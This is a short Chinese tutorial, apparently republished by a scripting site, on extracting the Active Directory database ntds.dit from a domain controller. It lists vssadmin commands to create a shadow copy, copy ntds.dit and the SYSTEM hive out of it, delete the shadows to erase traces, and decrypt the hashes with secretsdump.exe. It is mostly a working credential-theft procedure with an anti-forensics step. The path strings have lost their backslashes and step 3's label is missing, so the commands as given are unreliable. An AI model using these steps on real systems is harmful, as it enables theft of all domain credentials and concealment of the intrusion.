脚本宝典收集整理的这篇文章主要介绍了域控上获取Ntds.dit并解密,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
利用Vssadmin程序, 域环境默认安装(支持Server2008、2012)
1、先查询当前系统的快照:vssadmin list shadows 命令执行完后显示大致如下
2、创建快照:vssadmin create shadow /for=c:
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy2windowsNTDSntds.dit C:ntds.dit
4、解密需要用到System文件,所以也需要把这个文件导出来
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy2windowsSystem32configSYSTEM C:system.hive
5、删除快照删除痕迹:vssadmin delete shadows /for=c: /quiet
6、回过头到第一步,再查看一下当前系统快照,发现没了
7、解密Ntds.dit文件,这里使用secretsdump.exe进行解密
以上是脚本宝典为你收集整理的域控上获取Ntds.dit并解密全部内容,希望文章能够帮你解决域控上获取Ntds.dit并解密所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。